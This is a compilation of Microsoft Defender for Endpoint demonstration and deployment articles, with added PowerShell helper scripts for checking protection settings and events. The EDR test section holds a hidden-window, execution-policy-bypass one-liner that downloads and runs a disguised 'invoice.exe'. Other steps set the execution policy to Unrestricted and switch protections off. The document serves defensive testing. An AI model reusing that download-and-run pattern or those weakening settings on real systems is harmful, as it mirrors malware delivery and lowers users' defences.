Utilize Microsoft cloud-delivered protection in Microsoft Defender Antivirus

Microsoft Defender for Endpoint - demonstration scenarios



Controlled folder access (CFA) demonstration test tool (block script)

Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Controlled Folder Access helps you protect valuable data from malicious apps and
threats, such as ransomware. All apps (any executable file, including .exe, .scr, .dll files
and others) are assessed by Microsoft Defender Antivirus, which then determines if the
app is malicious or safe. If the app is determined to be malicious or suspicious, then it
will not be allowed to make changes to any files in any protected folder.

Scenario requirements and setup

Windows 10 1709 build 16273
Microsoft Defender Antivirus (active mode)

PowerShell commands

PowerShell

Set-MpPreference -EnableControlledFolderAccess <State>

Rule states

| State    | Mode       | Numeric value |
|----------|------------|---------------|
| Disabled | Off        | 0             |
| Enabled  | Block mode | 1             |
| Audit    | Audit mode | 2             |

Verify configuration

PowerShell

Get-MpPreference

Scenario

Setup
Download and run this setup script. Before running the script, set the execution policy to
Unrestricted using this PowerShell command:

PowerShell

Set-ExecutionPolicy Unrestricted

You can perform these manual steps instead:

1. Turn on CFA using PowerShell command:

PowerShell

Set-MpPreference -EnableControlledFolderAccess Enabled

2. Download the CFA test tool


3. Execute the PowerShell commands above

Scenario: Use the CFA test tool to simulate an untrusted process writing to a protected folder

1. Launch the CFA test tool.
2. Select the desired folder and create a file.

You can find more information here.

Clean-up
Download and run this cleanup script . You can perform these manual steps instead:

PowerShell
Set-MpPreference -EnableControlledFolderAccess Disabled

See also
Controlled folder access



Controlled folder access (CFA) demonstrations (block ransomware)

Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Controlled folder access helps you protect valuable data from malicious apps and
threats, such as ransomware. Microsoft Defender Antivirus assesses all apps (any
executable file, including .exe, .scr, .dll files and others) and then determines if the app is
malicious or safe. If the app is determined to be malicious or suspicious, then the app
can't make changes to any files in any protected folder.

Scenario requirements and setup

Windows 10 1709 build 16273
Microsoft Defender Antivirus (active mode)

PowerShell commands

PowerShell

Set-MpPreference -EnableControlledFolderAccess <State>

PowerShell

Set-MpPreference -ControlledFolderAccessProtectedFolders C:\demo\

Rule states

| State    | Mode       | Numeric value |
|----------|------------|---------------|
| Disabled | Off        | 0             |
| Enabled  | Block mode | 1             |
| Audit    | Audit mode | 2             |

Verify configuration

PowerShell

Get-MpPreference

Test file
CFA ransomware test file

Scenarios

Setup
Download and run this setup script. Before running the script, set the execution policy to
Unrestricted using this PowerShell command:

PowerShell

Set-ExecutionPolicy Unrestricted

You can perform these manual steps instead:

1. Create a folder under c: named demo, "c:\demo".

2. Save this clean file into c:\demo (we need something to encrypt).

3. Execute PowerShell commands listed earlier in this article.

Scenario 1: CFA blocks ransomware test file

1. Turn on CFA using the PowerShell command:

PowerShell

Set-MpPreference -EnableControlledFolderAccess Enabled

2. Add the demo folder to the protected folders list using the PowerShell command:

PowerShell

Set-MpPreference -ControlledFolderAccessProtectedFolders C:\demo\

3. Download the ransomware test file.

4. Execute the ransomware test file (this isn't ransomware; it simply tries to encrypt
c:\demo).

Scenario 1 expected results

5 seconds after executing the ransomware test file, you should see a notification that CFA
blocked the encryption attempt.

Scenario 2: What would happen without CFA

1. Turn off CFA using this PowerShell command:

PowerShell

Set-MpPreference -EnableControlledFolderAccess Disabled

2. Execute the ransomware test file.

Scenario 2 expected results

The files in c:\demo are encrypted and you should get a warning message.
Execute the ransomware test file again to decrypt the files.

Clean-up

Download and run this cleanup script. You can perform these manual steps instead:

PowerShell

Set-MpPreference -EnableControlledFolderAccess Disabled

Clean up c:\demo encryption by using the encrypt/decrypt file.
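The two CFA articles above (the test tool and the ransomware test file) configure the same feature by hand; the following PowerShell is an added example, not from either Microsoft article, that wraps those steps, shows the audit-before-block order a practitioner would use, and reads back the block (1123) and audit (1124) events behind the notification. It assumes an elevated session on Windows 10 1709 or later with Microsoft Defender Antivirus in active mode; C:\demo\ is the folder both articles use.

```powershell
# Added example, not from the Microsoft articles. Run in an elevated PowerShell on
# Windows 10 1709 or later with Microsoft Defender Antivirus in active mode.

function Set-CfaDemoProtection {
    # Turns CFA on (or to audit), protects the demo folder and optionally trusts named apps.
    param(
        [ValidateSet('Disabled', 'Enabled', 'AuditMode')] [string]$State = 'Enabled',
        [string]$Folder = 'C:\demo\',
        [string[]]$AllowedApps = @()   # full paths of apps that legitimately write to the folder
    )
    if (-not (Test-Path $Folder)) { New-Item -ItemType Directory -Path $Folder | Out-Null }
    Set-MpPreference -EnableControlledFolderAccess $State
    # Add-MpPreference appends to the lists; Set-MpPreference would replace them.
    Add-MpPreference -ControlledFolderAccessProtectedFolders $Folder
    foreach ($app in $AllowedApps) { Add-MpPreference -ControlledFolderAccessAllowedApplications $app }
}

function Get-CfaState {
    $pref = Get-MpPreference
    # Numeric values as in the rule states table: 0 = Disabled, 1 = Block, 2 = Audit.
    $mode = switch ([int]$pref.EnableControlledFolderAccess) {
        0 { 'Disabled' } 1 { 'Block' } 2 { 'Audit' } default { "Other($_)" }
    }
    [pscustomobject]@{
        Mode             = $mode
        ProtectedFolders = @($pref.ControlledFolderAccessProtectedFolders)
        AllowedApps      = @($pref.ControlledFolderAccessAllowedApplications)
    }
}

function Get-CfaEvent {
    param([int]$Hours = 1)
    # 1123 = CFA blocked a write by an untrusted app; 1124 = audit mode recorded it instead.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1123, 1124
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Pull the named EventData fields (Process Name, Path) out of the event XML.
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $outcome = if ($_.Id -eq 1123) { 'Blocked' } else { 'Audited' }
        [pscustomobject]@{
            Time    = $_.TimeCreated
            Outcome = $outcome
            Process = $data['Process Name']
            File    = $data['Path']
        }
    }
}

# Audit first to see which processes would be blocked, then enforce for Scenario 1.
Set-CfaDemoProtection -State AuditMode
Get-CfaState | Format-List
Set-CfaDemoProtection -State Enabled
Get-CfaEvent -Hours 24 | Format-Table -AutoSize
```

After running the ransomware test file in Scenario 1, Get-CfaEvent should list a Blocked entry whose Process is the test file and whose File is under C:\demo; in Scenario 2 (CFA disabled) no event is written.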


See also
Controlled folder access



EDR detection test for verifying device's onboarding and reporting services

Article • 01/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business

Scenario requirements and setup

Windows 11, Windows 10 version 1709 build 16273 or newer, Windows 8.1, or
Windows 7 SP1.
Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows
Server 2012 R2, and Windows Server 2008 R2 SP1.
Linux
macOS
Microsoft Defender for Endpoint
Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on macOS

Endpoint detection and response in Defender for Endpoint provides advanced attack
detections that are near real-time and actionable. Security analysts can prioritize alerts
effectively, gain visibility into the full scope of a breach, and take response actions to
remediate threats.

Run an EDR detection test to verify that the device is properly onboarded and reporting
to the service. Perform the following steps on the newly onboarded device:

Windows

1. Open a Command Prompt window.

2. At the prompt, copy and run the command below. The Command Prompt window
will close automatically.

PowerShell

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'

3. If successful, the detection test will be marked as completed and a new alert will
appear in a few minutes.
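A missing alert after step 3 is most often a device that was never fully onboarded rather than a detection problem. The following PowerShell is an added example, not from the Microsoft article; it assumes an elevated session on the Windows device under test and reads the sensor's Status registry key (OnboardingState, OrgId), the Sense service state and the sensor's operational event channel.

```powershell
# Added example, not from the Microsoft article. Run in an elevated PowerShell on the
# Windows device you are about to test.

function Test-MdeOnboarding {
    # The detection test only produces an alert when the Sense service is running and the
    # Status key shows OnboardingState = 1 for the tenant (OrgId) it was onboarded to.
    $statusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'
    $status = Get-ItemProperty -Path $statusKey -ErrorAction SilentlyContinue
    $sense  = Get-Service -Name Sense -ErrorAction SilentlyContinue

    # Recent sensor events show whether the sensor is active at all on this device.
    $recentSense = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-SENSE/Operational'
        StartTime = (Get-Date).AddHours(-1)
    } -ErrorAction SilentlyContinue

    $serviceState = if ($sense) { [string]$sense.Status } else { 'NotInstalled' }
    [pscustomobject]@{
        SenseService        = $serviceState
        OnboardingState     = $status.OnboardingState   # 1 = onboarded
        OrgId               = $status.OrgId             # tenant the sensor reports to
        SenseEventsLastHour = @($recentSense).Count
        Onboarded           = ($serviceState -eq 'Running') -and ($status.OnboardingState -eq 1)
    }
}

Test-MdeOnboarding | Format-List
```

If Onboarded is false, rerun the onboarding package for the device before repeating the detection test; if it is true and no alert appears, the device's network path to the service is the next thing to check.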

Linux

1. Download the script file to an onboarded Linux server:

Bash

curl -L -o ~/Downloads/"MDE Linux DIY.zip" https://aka.ms/LinuxDIY

2. Extract the zip:

Bash

unzip ~/Downloads/"MDE Linux DIY.zip"

3. Run the following command:

Bash

./mde_linux_edr_diy.sh

After a few minutes, a detection should be raised in Microsoft Defender XDR.

4. Look at the alert details, machine timeline, and perform your typical investigation
steps.

macOS

1. In your browser, Microsoft Edge for Mac or Safari, download MDATP MacOS DIY.zip
from https://aka.ms/mdatpmacosdiy and extract it.

The following prompt appears:

Do you want to allow downloads on "mdatpclientanalyzer.blob.core.windows.net"?
You can change which websites can download files in Websites Preferences.

2. Click Allow.

3. Open Downloads.

4. You should see MDATP MacOS DIY.

Tip

If you double-click MDATP MacOS DIY, you get the following message:

"MDATP MacOS DIY" cannot be opened because the developer cannot be verified.
macOS cannot verify that this app is free from malware.
[Move to Trash] [Cancel]

5. Click Cancel.

6. Right-click MDATP MacOS DIY, and then click Open.

The system displays the following message:

macOS cannot verify the developer of MDATP MacOS DIY. Are you sure you want to open it?
By opening this app, you will be overriding system security which can expose
your computer and personal information to malware that may harm your Mac
or compromise your privacy.

7. Click Open.

The system displays the following message:

Microsoft Defender for Endpoint - macOS EDR DIY test file
Corresponding alert will be available in the MDATP portal.

8. Click Open.

In a few minutes, an alert named macOS EDR Test Alert is raised.

9. Go to the Microsoft Defender portal (https://security.microsoft.com/).

10. Go to the Alert Queue.

The macOS EDR test alert shows severity, category, detection source, and a
collapsed menu of actions.

Look at the alert details and the device timeline, and perform the regular
investigation steps.

Next steps that you can consider performing are to add AV exclusions as needed for
application compatibility or performance:

Configure and validate exclusions for Microsoft Defender for Endpoint on macOS
Address false positives/negatives in Microsoft Defender for Endpoint
Manage suppression rules
Create indicators of compromise (IoC)
Create and manage custom detections rules

Read through Microsoft Defender for Endpoint Security Operations Guide.



Exploit protection (EP) demonstrations
Article • 01/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus
Microsoft Defender for Individuals

Exploit Protection automatically applies exploit mitigation settings system wide and on
individual apps. Many of the features in the Enhanced Mitigation Experience Toolkit
(EMET) have been included in Exploit Protection, and you can convert and import
existing EMET configuration profiles into Exploit Protection.

Scenario requirements and setup

Windows 11 or Windows 10 1709 build 16273 or newer
Windows Server 2022, Windows Server 2019, and Windows Server 2016.
Run PowerShell commands:

PowerShell

Set-ProcessMitigation -PolicyFilePath ProcessMitigation.xml

PowerShell

Get-Help Set-ProcessMitigation

Verify configuration

PowerShell

Get-ProcessMitigation

Sample xml file

EP xml config file (right-click, "save target as")
Scenario

Scenario 1: Convert EMET xml to Exploit Protection settings

1. Convert the EMET xml, run the PowerShell command (replace the placeholders with
your EMET export and the output file name):

PowerShell

ConvertTo-ProcessMitigationPolicy -EMETFilePath <emet-config>.xml -OutputFilePath <ep-config>.xml

2. Apply settings, run the PowerShell command using the XML from the prior step:

PowerShell

Set-ProcessMitigation -PolicyFilePath <ep-config>.xml

3. Confirm settings were applied, run the PowerShell command:

PowerShell

Get-ProcessMitigation

4. Review the event log for application compatibility.

Scenario 2: Apply selfhost xml to Exploit Protection settings

1. Download our EP xml config file (right-click, "save target as") or use your own.

2. Apply settings, run the PowerShell command:

PowerShell

Set-ProcessMitigation -PolicyFilePath ProcessMitigation.xml

3. Confirm settings were applied, run the PowerShell command:

PowerShell

Get-ProcessMitigation

4. Review the event log for application compatibility.
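Steps 2 to 4 of both scenarios can be exercised end to end with the following PowerShell, an added example that is not part of the Microsoft article. The XML it writes is a constructed sample in the format Get-ProcessMitigation -RegistryConfigFilePath exports (the article's own EP xml config file is linked but not reproduced on the page); notepad.exe is used as a harmless target, and the event check reads the Security-Mitigations channels that record enforcement.

```powershell
# Added example, not from the Microsoft article. Run in an elevated PowerShell on
# Windows 10 1709+/Windows 11 or Windows Server 2016+. The policy XML below is a
# constructed sample; substitute the article's EP xml config file or your own.

function Set-DemoMitigationPolicy {
    param([string]$PolicyPath = (Join-Path $env:TEMP 'ProcessMitigation.xml'))
    @'
<?xml version="1.0" encoding="UTF-8"?>
<MitigationPolicy>
  <!-- Per-app settings override the system defaults for this executable only. -->
  <AppConfig Executable="notepad.exe">
    <DEP Enable="true" EmulateAtlThunks="false" />
    <ASLR ForceRelocateImages="true" RequireInfo="false" BottomUp="true" HighEntropy="true" />
    <ControlFlowGuard Enable="true" SuppressExports="false" StrictControlFlowGuard="false" />
  </AppConfig>
  <!-- System-wide defaults applied to every process without a per-app entry. -->
  <SystemConfig>
    <DEP Enable="true" EmulateAtlThunks="false" />
    <SEHOP Enable="true" TelemetryOnly="false" />
  </SystemConfig>
</MitigationPolicy>
'@ | Set-Content -Path $PolicyPath -Encoding UTF8
    Set-ProcessMitigation -PolicyFilePath $PolicyPath   # step 2
    $PolicyPath
}

function Get-DemoMitigationState {
    # Step 3: effective per-app settings for notepad.exe and the system defaults.
    [pscustomobject]@{
        App    = Get-ProcessMitigation -Name notepad.exe
        System = Get-ProcessMitigation -System
    }
}

function Get-MitigationEvent {
    param([int]$Hours = 24)
    # Step 4: exploit protection records mitigation enforcement in these two channels;
    # an entry naming a line-of-business app is the application-compatibility signal to review.
    $filter = @{
        LogName   = 'Microsoft-Windows-Security-Mitigations/UserMode',
                    'Microsoft-Windows-Security-Mitigations/KernelMode'
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, ProviderName, Message
}

Set-DemoMitigationPolicy
Get-DemoMitigationState
Get-MitigationEvent | Format-Table -AutoSize -Wrap
```

Start notepad.exe after applying the policy; Get-ProcessMitigation -Name notepad.exe should then show DEP, ASLR and CFG as enabled for that image.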

See also
Exploit Protection

Microsoft Defender for Endpoint - demonstration scenarios



Network protection demonstrations
Article • 01/18/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus

Network Protection helps reduce the attack surface of your devices from Internet-based
events. It prevents employees from using any application to access dangerous domains
that may host phishing scams, exploits, and other malicious content on the Internet.

Scenario requirements and setup

Windows 11 or Windows 10 version 1709 build 16273 or newer.
Windows Server 2022, Windows Server 2019, Windows Server 2016, and Windows
Server 2012 R2 with the new unified MDE Client.
macOS
Linux
Microsoft Defender Antivirus

Windows

PowerShell command

PowerShell

Set-MpPreference -EnableNetworkProtection Enabled

Rule states

| State    | Mode       | Numeric value |
|----------|------------|---------------|
| Disabled | Off        | 0             |
| Enabled  | Block mode | 1             |
| Audit    | Audit mode | 2             |

Verify configuration

PowerShell

Get-MpPreference

Scenario

1. Turn on Network Protection using the PowerShell command:

PowerShell

Set-MpPreference -EnableNetworkProtection Enabled

2. Using the browser of your choice (not Microsoft Edge), navigate to the Network
Protection website test. Microsoft Edge has other security measures in place to
protect from this vulnerability (SmartScreen).

Expected results

Navigation to the website should be blocked and you should see a Connection blocked
notification.

Clean-up

PowerShell

Set-MpPreference -EnableNetworkProtection Disabled
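The Windows scenario above turns network protection straight on; the following PowerShell is an added example, not part of the Microsoft article, that runs the same test in audit mode first, adds the switches Windows Server needs before EnableNetworkProtection takes effect, and reads back the audit (1125) and block (1126) events behind the "Connection blocked" notification. It assumes an elevated session with Microsoft Defender Antivirus active and uses the test site the article itself points at.

```powershell
# Added example, not from the Microsoft article. Run in an elevated PowerShell on
# Windows 10/11 or a supported Windows Server with Microsoft Defender Antivirus.

function Set-NetworkProtectionMode {
    param([ValidateSet('Disabled', 'Enabled', 'AuditMode')] [string]$Mode = 'AuditMode')
    # ProductType 1 = workstation; anything else is a domain controller or server.
    $isServer = (Get-CimInstance Win32_OperatingSystem).ProductType -ne 1
    if ($isServer) {
        # On Windows Server, network protection also needs these switches before
        # EnableNetworkProtection has any effect (DownLevel covers Server 2012 R2 and 2016).
        Set-MpPreference -AllowNetworkProtectionOnWinServer $true
        Set-MpPreference -AllowNetworkProtectionDownLevel $true
    }
    Set-MpPreference -EnableNetworkProtection $Mode
    # Read back the numeric value from the rule states table: 0 = Off, 1 = Block, 2 = Audit.
    switch ([int](Get-MpPreference).EnableNetworkProtection) {
        0 { 'Disabled' } 1 { 'Block' } 2 { 'Audit' } default { "Other($_)" }
    }
}

function Test-NetworkProtectionBlock {
    # In block mode the connection is reset and Invoke-WebRequest throws; in audit mode the
    # request succeeds but an audit event (1125) is still written.
    try {
        Invoke-WebRequest -Uri 'https://smartscreentestratings2.net/' -UseBasicParsing -TimeoutSec 10 | Out-Null
        'Allowed'
    } catch {
        "Blocked or unreachable: $($_.Exception.Message)"
    }
}

function Get-NetworkProtectionEvent {
    param([int]$Hours = 1)
    # 1125 = audited connection to a blocked destination; 1126 = connection blocked.
    $filter = @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 1125, 1126
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        # Pull the named EventData fields out of the event XML; Path carries the destination.
        $data = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        $outcome = if ($_.Id -eq 1126) { 'Blocked' } else { 'Audited' }
        [pscustomobject]@{
            Time        = $_.TimeCreated
            Outcome     = $outcome
            Process     = $data['Process Name']
            Destination = $data['Path']
        }
    }
}

Set-NetworkProtectionMode -Mode AuditMode   # observe first
Test-NetworkProtectionBlock
Set-NetworkProtectionMode -Mode Enabled     # then enforce, as in step 1 above
Test-NetworkProtectionBlock
Get-NetworkProtectionEvent | Format-Table -AutoSize
```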

macOS/Linux

To configure the Network Protection enforcement level, run the following command
from the Terminal:

Bash

mdatp config network-protection enforcement-level --value [enforcement-level]

For example, to configure network protection to run in blocking mode, execute the
following command:

Bash

mdatp config network-protection enforcement-level --value block

To confirm that network protection has been started successfully, run the following
command from the Terminal, and verify that it prints "started":

Bash

mdatp health --field network_protection_status

To test Network Protection on macOS/Linux

1. Using the browser of your choice (not Microsoft Edge), navigate to the Network
Protection website test. Microsoft Edge has other security measures in place to
protect from this vulnerability (SmartScreen).

2. Or, from the terminal:

Bash

curl -o ~/Downloads/smartscreentestratings2.net https://smartscreentestratings2.net/

Expected results

Navigation to the website should be blocked and you should see a Connection blocked
notification.

Clean-up

Bash

mdatp config network-protection enforcement-level --value audit

See also
Network Protection

Microsoft Defender for Endpoint - demonstration scenarios



Potentially unwanted applications (PUA) demonstration

Article • 01/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus
Microsoft Defender for Individuals

The Potentially Unwanted Applications (PUA) protection feature in Microsoft Defender
Antivirus can identify and block PUAs from downloading and installing on endpoints in
your network. These applications aren't considered viruses, malware, or other types of
threats, but might perform actions on endpoints that adversely affect their performance
or use.

Scenario requirements and setup

Windows 11 or Windows 10
Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows
Server 2012 R2, and Windows Server 2008 R2 SP1
macOS
Linux
Enable PUA protection. For more information, see the Detect and block Potentially
Unwanted Applications article.
You can also download and use the PowerShell script to enable this setting and
others.

Scenario

1. Go to http://www.amtso.org/feature-settings-check-potentially-unwanted-applications/
2. Click the "Download the Potentially Unwanted Application 'test' file" link.
3. After downloading the file, it's automatically blocked and prevented from running.

See also
Detect and block Potentially Unwanted Applications

Microsoft Defender for Endpoint - demonstration scenarios



URL reputation demonstrations
Article • 01/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1

Test how Microsoft Defender SmartScreen helps you identify phishing and malware
websites based on URL reputation.

Scenario requirements and setup

Windows 11 or Windows
Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows
Server 2012 R2 and Windows Server 2008 R2 SP1.
Microsoft Edge browser required
For more information, see Microsoft Defender SmartScreen

SmartScreen for Microsoft Edge URL scenario demonstrations

Is This Phishing?

Alerts the user to a suspicious page and asks for feedback:

Is this Phishing?

Launching this link should render a message similar to the following screenshot:
Phishing Page
A page known for phishing that should be blocked:

A known Phishing page

Launching this link should render a message similar to the following example:
Malware page
A page that hosts malware and should be blocked:

A known malware page

Launching this link should render a message similar to the following screenshot:

Blocked download
Blocked from downloading because of its URL reputation

Download blocked due to URL reputation

Launching this link should render a message similar to the Malware page message.

Exploit page
A page that attacks a browser vulnerability

Known browser exploit page

Launching this link should render a message similar to the Malware page message.

Malvertising
A benign page hosting a malicious advertisement
A page known to contain malicious advertisements

Launching this link should render a message similar to the following screenshot:

See also
Microsoft Defender SmartScreen Documentation

Microsoft Defender for Endpoint - demonstration scenarios



Get started with your Microsoft Defender for Endpoint deployment

Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Tip

As a companion to this article, we recommend using the Microsoft Defender for
Endpoint automated setup guide when signed in to the Microsoft 365 admin
center. This guide will customize your experience based on your environment. To
review best practices without signing in and activating automated setup features,
go to the Microsoft 365 setup guide.

Maximize available security capabilities and better protect your enterprise from cyber
threats by deploying Microsoft Defender for Endpoint and onboarding your devices.
Onboarding your devices enables you to identify and stop threats quickly, prioritize
risks, and evolve your defenses across operating systems and network devices.

This guide provides five steps to help deploy Defender for Endpoint as your multi-
platform endpoint protection solution. It helps you choose the best deployment tool,
onboard devices, and configure capabilities. Each step corresponds to a separate article.

The steps to deploy Defender for Endpoint are:

1. Step 1 - Set up Microsoft Defender for Endpoint deployment: This step focuses on
getting your environment ready for deployment.
2. Step 2 - Assign roles and permissions: Identify and assign roles and permissions to
view and manage Defender for Endpoint.
3. Step 3 - Identify your architecture and choose your deployment method: Identify
your architecture and the deployment method that best suits your organization.
4. Step 4 - Onboard devices: Assess and onboard your devices to Defender for
Endpoint.
5. Step 5 - Configure capabilities: You're now ready to configure Defender for
Endpoint security capabilities to protect your devices.

Requirements

Here's a list of prerequisites required to deploy Defender for Endpoint:

You're a global admin
Your environment meets the minimum requirements
You have a full inventory of your environment. The following table provides a
starting point to gather information and ensure your environment is deeply
understood by stakeholders, which helps identify potential dependencies and/or
changes required in technologies or processes.

| What | Description |
|------|-------------|
| Endpoint count | Total count of endpoints by operating system. |
| Server count | Total count of servers by operating system version. |
| Management engine | Management engine name and version (for example, System Center Configuration Manager Current Branch 1803). |
| CDOC distribution | High-level CDOC structure (for example, Tier 1 outsourced to Contoso, Tier 2 and Tier 3 in-house distributed across Europe and Asia). |
| Security information and event management (SIEM) | SIEM technology in use. |

Next step
Start your deployment with Step 1 - Set up Microsoft Defender for Endpoint deployment



Set up Microsoft Defender for Endpoint deployment

Article • 11/29/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

The first step when deploying Microsoft Defender for Endpoint is to set up your
Defender for Endpoint environment.

In this deployment scenario, you'll be guided through the steps on:

Licensing validation
Tenant configuration
Network configuration

Note

For the purpose of guiding you through a typical deployment, this scenario will
only cover the use of Microsoft Configuration Manager. Defender for Endpoint
supports the use of other onboarding tools but we won't cover those scenarios in
the deployment guide. For more information, see Identify Defender for Endpoint
architecture and deployment method.

Check license state

Checking for the license state and whether it was properly provisioned can be done
through the admin center or through the Microsoft Azure portal.

1. To view your licenses, go to the Microsoft Azure portal and navigate to the
Microsoft Azure portal license section.

2. Alternately, in the admin center, navigate to Billing > Subscriptions.

On the screen, you'll see all the provisioned licenses and their current Status.

Cloud Service Provider validation

To gain access into which licenses are provisioned to your company, and to check the
state of the licenses, go to the admin center.

1. From the Partner portal, select Administer services > Office 365.

2. Clicking on the Partner portal link will open the Admin on behalf option and will
give you access to the customer admin center.

Tenant Configuration
Onboarding to Microsoft Defender for Endpoint is easy. From the navigation menu,
select any item under the Endpoints section, or any Microsoft Defender XDR feature
such as Incidents, Hunting, Action center, or Threat analytics to initiate the onboarding
process.

From a web browser, navigate to the Microsoft Defender portal .

Data center location

Microsoft Defender for Endpoint will store and process data in the same location as
used by Microsoft Defender XDR. If Microsoft Defender XDR has not been turned on yet,
onboarding to Microsoft Defender for Endpoint will also turn on Microsoft Defender
XDR and a new data center location is automatically selected based on the location of
active Microsoft 365 security services. The selected data center location is shown on the
screen.

Network configuration

If the organization doesn't require the endpoints to use a proxy to access the Internet,
skip this section.

The Microsoft Defender for Endpoint sensor requires Microsoft Windows HTTP
(WinHTTP) to report sensor data and communicate with the Microsoft Defender for
Endpoint service. The embedded Microsoft Defender for Endpoint sensor runs in the
system context using the LocalSystem account. The sensor uses Microsoft Windows
HTTP Services (WinHTTP) to enable communication with the Microsoft Defender for
Endpoint cloud service. The WinHTTP configuration setting is independent of the
Windows Internet (WinINet) internet browsing proxy settings and can only discover a
proxy server by using the following discovery methods:

Autodiscovery methods:
    Transparent proxy
    Web Proxy Autodiscovery Protocol (WPAD)

    If a transparent proxy or WPAD has been implemented in the network topology,
    there is no need for special configuration settings. For more information on
    Microsoft Defender for Endpoint URL exclusions in the proxy, see the Proxy Service
    URLs section in this document for the URLs allow list, or see Configure device proxy
    and Internet connectivity settings.

Manual static proxy configuration:
    Registry-based configuration
    WinHTTP configured using netsh command

    Suitable only for desktops in a stable topology (for example: a desktop in a
    corporate network behind the same proxy).

Configure the proxy server manually using a registry-based static proxy

Configure a registry-based static proxy to allow only the Microsoft Defender for Endpoint
sensor to report diagnostic data and communicate with Microsoft Defender for
Endpoint services if a computer isn't permitted to connect to the Internet. The static
proxy is configurable through Group Policy (GP). The group policy can be found under:

Administrative Templates > Windows Components > Data Collection and Preview
Builds > Configure Authenticated Proxy usage for the Connected User Experience
and Telemetry Service
Set it to Enabled and select Disable Authenticated Proxy usage

1. Open the Group Policy Management Console.

2. Create a policy or edit an existing policy based off the organizational practices.

3. Edit the Group Policy and navigate to Administrative Templates > Windows
Components > Data Collection and Preview Builds > Configure Authenticated
Proxy usage for the Connected User Experience and Telemetry Service.

4. Select Enabled.

5. Select Disable Authenticated Proxy usage.

6. Navigate to Administrative Templates > Windows Components > Data Collection
and Preview Builds > Configure connected user experiences and telemetry.

7. Select Enabled.

8. Enter the Proxy Server Name.

The policy sets two registry values, TelemetryProxyServer as REG_SZ and
DisableEnterpriseAuthProxy as REG_DWORD, under the registry key
HKLM\Software\Policies\Microsoft\Windows\DataCollection.

The registry value TelemetryProxyServer takes the following string format:

<server name or ip>:<port>

For example: 10.0.0.6:8080

The registry value DisableEnterpriseAuthProxy should be set to 1.
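On a lab device without a GPO, the same two registry values can be written and verified directly. The following PowerShell is an added example, not part of the Microsoft article; it validates the <server name or ip>:<port> format described above, writes both values under the DataCollection policy key, and reads them back alongside the WinHTTP proxy so the two configuration methods can be compared. The proxy address 10.0.0.6:8080 is the article's example value, not a real endpoint.

```powershell
# Added example, not from the Microsoft article. Run in an elevated PowerShell.

$DataCollectionKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection'

function Set-MdeStaticProxy {
    # Writes the two values the "Configure connected user experiences and telemetry" and
    # "Configure Authenticated Proxy usage" policies set, for devices managed without a GPO.
    param([Parameter(Mandatory)][string]$ProxyServer)   # "<server name or ip>:<port>"
    if ($ProxyServer -notmatch '^[^:\s/]+:\d{1,5}$') {
        throw "Expected <server name or ip>:<port>, got '$ProxyServer'"
    }
    if (-not (Test-Path $DataCollectionKey)) { New-Item -Path $DataCollectionKey -Force | Out-Null }
    New-ItemProperty -Path $DataCollectionKey -Name TelemetryProxyServer `
        -PropertyType String -Value $ProxyServer -Force | Out-Null
    New-ItemProperty -Path $DataCollectionKey -Name DisableEnterpriseAuthProxy `
        -PropertyType DWord -Value 1 -Force | Out-Null
}

function Get-MdeStaticProxy {
    # Reads back the registry-based configuration and the netsh WinHTTP proxy, if any,
    # so you can see which of the two methods is in effect on this device.
    $p = Get-ItemProperty -Path $DataCollectionKey -ErrorAction SilentlyContinue
    [pscustomobject]@{
        TelemetryProxyServer       = $p.TelemetryProxyServer
        DisableEnterpriseAuthProxy = $p.DisableEnterpriseAuthProxy
        # The sensor honours the static proxy only when both values are present and the DWORD is 1.
        RegistryProxyConfigured    = [bool]$p.TelemetryProxyServer -and $p.DisableEnterpriseAuthProxy -eq 1
        WinHttpProxy               = (netsh winhttp show proxy | Out-String).Trim()
    }
}

Set-MdeStaticProxy -ProxyServer '10.0.0.6:8080'   # article's example address
Get-MdeStaticProxy | Format-List
```

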